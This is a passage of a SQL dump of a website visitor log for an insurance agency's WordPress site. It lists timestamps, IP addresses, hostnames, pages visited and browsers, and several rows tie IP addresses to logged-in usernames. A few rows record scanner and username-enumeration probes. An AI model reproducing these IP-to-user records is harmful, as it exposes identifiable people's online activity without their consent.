like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(24618,'0b_89d9c2aedb25e1ace06a89f10b269daf','1462368358','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(24621,'0b_bed0bb68b862d18013324dc45c6940d0','1462370500','136.243.152.18','static.18.152.243.136.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(24624,'0b_a0adf34c8bd9771b776a50f9f00c3edb','1462371622','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(24627,'0b_a0adf34c8bd9771b776a50f9f00c3edb','1462371629','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(24629,'0b_b5e75d947e747a67c8a88c2bc78df158','1462372744','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24630,'0b_b5e75d947e747a67c8a88c2bc78df158','1462372746','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24632,'0b_fa53356220016c67cf843f9ffe039dd7','1462373100','208.115.111.66','208-115-111-66-reverse.wowrack.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(24633,'0b_b5e75d947e747a67c8a88c2bc78df158','1462373127','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24635,'0b_b5e75d947e747a67c8a88c2bc78df158','1462373129','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24636,'0b_bf05ea65b3f80ce131c58dbf5fc61abd','1462373494','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24638,'0b_b5e75d947e747a67c8a88c2bc78df158','1462373900','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24639,'0b_b5e75d947e747a67c8a88c2bc78df158','1462373902','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24642,'0b_92e908307622d483a54127c61398a4a9','1462374051','69.175.22.218','newscan02.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(24644,'0b_92e908307622d483a54127c61398a4a9','1462374054','69.175.22.218','newscan02.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(24645,'0b_92e908307622d483a54127c61398a4a9','1462374056','69.175.22.218','newscan02.sitelock.com','/about-us/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(24648,'0b_92e908307622d483a54127c61398a4a9','1462374058','69.175.22.218','newscan02.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(24650,'0b_92e908307622d483a54127c61398a4a9','1462374061','69.175.22.218','newscan02.sitelock.com','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(24651,'0b_e21fe2d56606812b041dc2689657aa35','1462374190','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24653,'0b_e21fe2d56606812b041dc2689657aa35','1462374192','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24656,'0b_bb77ea2730716df0a877d0fb5aa37c3e','1462376109','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','3840 x 1080','','','','','','0','0',0),(24659,'0b_bb77ea2730716df0a877d0fb5aa37c3e','1462376113','75.99.37.250','ool-4b6325fa.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','3840 x 1080','','','','','','0','0',0),(24660,'0b_bb77ea2730716df0a877d0fb5aa37c3e','1462376249','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','3840 x 1080','','','','','','0','0',0),(24663,'0b_d71ecc550fa7ef07cd870b9d95d6df20','1462376543','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24666,'0b_b12e468a2e5bbba4d3cb7c2ffc2a8ecf','1462376659','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)','http://www.lego4x4.ru/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(24668,'0b_62e63e39e2fc683d276a092948bc8254','1462376659','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Opera/9.01 (Windows NT 5.1; U; en)','http://berlininsl.com/','',0,'WinXP','Opera 9','us','','','','','','','0','0',0),(24669,'0b_62e63e39e2fc683d276a092948bc8254','1462376660','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Opera/9.01 (Windows NT 5.1; U; en)','http://berlininsl.com/','',0,'WinXP','Opera 9','us','','','','','','','0','0',0),(24672,'0b_37046fa9cc18f2ed29e7731b1c10212a','1462376720','64.237.54.2','64.237.54.2.choopa.net','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(24675,'0b_bb77ea2730716df0a877d0fb5aa37c3e','1462376912','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','3840 x 1080','','','','SimkowitzCo','','0','51',0),(24677,'0b_bb77ea2730716df0a877d0fb5aa37c3e','1462377036','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','3840 x 1080','','','','SimkowitzCo','','0','51',0),(24680,'0b_bb77ea2730716df0a877d0fb5aa37c3e','1462377045','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','3840 x 1080','','','','SimkowitzCo','','0','51',0),(24681,'0b_bb77ea2730716df0a877d0fb5aa37c3e','1462377268','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','3840 x 1080','','','','SimkowitzCo','','0','51',0),(24684,'0b_e3f118bb444b28ab34e1e575995c6b12','1462377269','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','[404] /favicon.gif','Mozilla/4.0 (compatible; GoogleToolbar 7.5.7210.1528; Windows 6.1; MSIE 9.0.8112.16421)','','',0,'','Netscape 4','','','','','','','','0','0',0),(24686,'0b_7468bf65b4d0628b1b0adae2d4cdad8b','1462378512','62.210.148.247','mj10.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(24687,'0b_7468bf65b4d0628b1b0adae2d4cdad8b','1462378514','62.210.148.247','mj10.naefmarco.ch','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(24690,'0b_878323016a91589eaae4e50c473343ae','1462379693','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(24693,'0b_de41e2aaaf06a7336aeac810a3398eff','1462382501','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win8','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24696,'0b_bbab2da1c36ca8224df65b7fc391d29e','1462382501','66.128.11.2','66.128.11.2.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(24699,'0b_de41e2aaaf06a7336aeac810a3398eff','1462382503','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24702,'0b_bbab2da1c36ca8224df65b7fc391d29e','1462382502','66.128.11.2','66.128.11.2.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(24704,'0b_bbab2da1c36ca8224df65b7fc391d29e','1462382505','66.128.11.2','66.128.11.2.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(24707,'0b_bbab2da1c36ca8224df65b7fc391d29e','1462382514','66.128.11.2','66.128.11.2.xchangetele.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(24708,'0b_de41e2aaaf06a7336aeac810a3398eff','1462382522','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24710,'0b_bbab2da1c36ca8224df65b7fc391d29e','1462382537','66.128.11.2','66.128.11.2.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(24711,'0b_de41e2aaaf06a7336aeac810a3398eff','1462382539','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/forms/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Shmuli','','0','51',0),(24714,'0b_78f5aec8be2f9c38ffee6a9a0985adf4','1462382884','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(24716,'0b_78f5aec8be2f9c38ffee6a9a0985adf4','1462382888','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(24717,'0b_734f7dd30cf50dae5015ef71ef0aa3b1','1462382896','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24719,'0b_734f7dd30cf50dae5015ef71ef0aa3b1','1462382900','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24722,'0b_9be8713a031a8b0778903d42bad0aa59','1462384892','74.72.46.87','cpe-74-72-46-87.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(24725,'0b_9be8713a031a8b0778903d42bad0aa59','1462384896','74.72.46.87','cpe-74-72-46-87.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(24728,'0b_9be8713a031a8b0778903d42bad0aa59','1462385002','74.72.46.87','cpe-74-72-46-87.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(24731,'0b_9be8713a031a8b0778903d42bad0aa59','1462385024','74.72.46.87','cpe-74-72-46-87.nyc.res.rr.com','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1600 x 900','','','','Isaacd','','0','51',0),(24732,'0b_1eef652652c8831c57da8d559bb9788b','1462385053','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(24734,'0b_1eef652652c8831c57da8d559bb9788b','1462385054','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(24735,'0b_1eef652652c8831c57da8d559bb9788b','1462385089','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(24737,'0b_1eef652652c8831c57da8d559bb9788b','1462385096','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(24740,'0b_7396a315e8aa7a144af0eb030864bcd4','1462385349','24.189.48.254','ool-18bd30fe.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','0',0),(24743,'0b_7396a315e8aa7a144af0eb030864bcd4','1462385350','24.189.48.254','ool-18bd30fe.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','0',0),(24746,'0b_7396a315e8aa7a144af0eb030864bcd4','1462385358','24.189.48.254','ool-18bd30fe.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','0',0),(24749,'0b_7396a315e8aa7a144af0eb030864bcd4','1462385377','24.189.48.254','ool-18bd30fe.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','51',0),(24750,'0b_1eef652652c8831c57da8d559bb9788b','1462386901','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/underwriting-cheat-sheets/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(24753,'0b_9350e2bd65df9105c7b1622f748b3ee6','1462386972','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(24756,'0b_d702802d718bb47316b7734063f13e58','1462387904','207.241.231.165','crawl339.us.archive.org','/robots.txt','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(24759,'0b_93572110c226989ce385491ebfa75d30','1462388107','172.56.7.86','172.56.7.86','/','Mozilla/5.0 (Linux; Android 5.1; C6740N Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36','','',0,'Android 5','Chrome 47 Mobile','us','','','','','','','0','0',0),(24762,'0b_24b185d050f11236560c28e214621fdb','1462390376','54.200.28.179','ec2-54-200-28-179.us-west-2.compute.amazonaws.com','/?author=1','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.50','','',0,'WinXP','Opera 9','ru','','','','','','','0','0',0),(24765,'0b_9592fdaa0d8e2204b1c80118ae642087','1462390470','68.194.47.151','ool-44c22f97.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'WinXP','Chrome 49','us','','','','','','','0','0',0),(24768,'0b_dd5fa97ab28c978c5a45308c690dbc88','1462390712','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/underwriting-cheat-sheets/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(24771,'0b_dd5fa97ab28c978c5a45308c690dbc88','1462390994','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(24774,'0b_cab3f6ab84d57a6f9e35fbbd3d822b9e','1462392432','192.187.104.235','192.187.104.235','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(24776,'0b_cab3f6ab84d57a6f9e35fbbd3d822b9e','1462392445','192.187.104.235','192.187.104.235','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(24779,'0b_9b6e59f617a8a52dfa373179251d056f','1462393879','180.76.15.142','baiduspider-180-76-15-142.crawl.baidu.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(24782,'0b_c640fbab5403c585bf8c1e54ce2be042','1462393960','178.255.215.70','crawl06.exabot.com','/robots.txt','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(24783,'0b_c640fbab5403c585bf8c1e54ce2be042','1462393961','178.255.215.70','crawl06.exabot.com','/igo/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(24785,'0b_e3881123c8d355891f88e38be9025b72','1462394409','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(24788,'0b_c640fbab5403c585bf8c1e54ce2be042','1462395106','178.255.215.70','crawl06.exabot.com','/igo/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(24789,'0b_c640fbab5403c585bf8c1e54ce2be042','1462395107','178.255.215.70','crawl06.exabot.com','/?p=319','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(24792,'0b_c59fc8c34905791ded39aafa11a24fe1','1462396312','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(24795,'0b_d2fdb9e8c45b6af6112eb01335ddd7c4','1462396647','155.201.34.6','155.201.34.6','/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Google Chrome','us','','Google','','','','','0','0',0),(24797,'0b_43c2d472aa1f38e4430b049e3100f414','1462396675','155.201.34.6','155.201.34.6','/comments/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(24798,'0b_43c2d472aa1f38e4430b049e3100f414','1462396698','155.201.34.6','155.201.34.6','/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(24800,'0b_43c2d472aa1f38e4430b049e3100f414','1462396698','155.201.34.6','155.201.34.6','/home/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(24803,'0b_43c2d472aa1f38e4430b049e3100f414','1462396721','155.201.34.6','155.201.34.6','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(24804,'0b_81534d712e95afb08a2b423c4852892b','1462398324','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24806,'0b_81534d712e95afb08a2b423c4852892b','1462398326','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24809,'0b_6c031f18be49deb9c62c8af6c3d39bd3','1462398818','24.43.56.74','mail.cbisusa.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiKmsuOtMHMAhVS5WMKHSvlDyYQFggdMAA&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','0',0),(24810,'0b_6c031f18be49deb9c62c8af6c3d39bd3','1462398821','24.43.56.74','mail.cbisusa.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','0',0),(24813,'0b_6c031f18be49deb9c62c8af6c3d39bd3','1462398824','24.43.56.74','mail.cbisusa.com','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','0',0),(24815,'0b_6c031f18be49deb9c62c8af6c3d39bd3','1462398833','24.43.56.74','mail.cbisusa.com','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/contact/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','51',0),(24816,'0b_6c031f18be49deb9c62c8af6c3d39bd3','1462398836','24.43.56.74','mail.cbisusa.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','0',0),(24819,'0b_2f2dc6b9e29abb9f06b6cabd3bedabf8','1462400331','50.108.153.152','50.108.153.152','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24821,'0b_2f2dc6b9e29abb9f06b6cabd3bedabf8','1462400342','50.108.153.152','50.108.153.152','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24822,'0b_2f2dc6b9e29abb9f06b6cabd3bedabf8','1462400457','50.108.153.152','50.108.153.152','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like 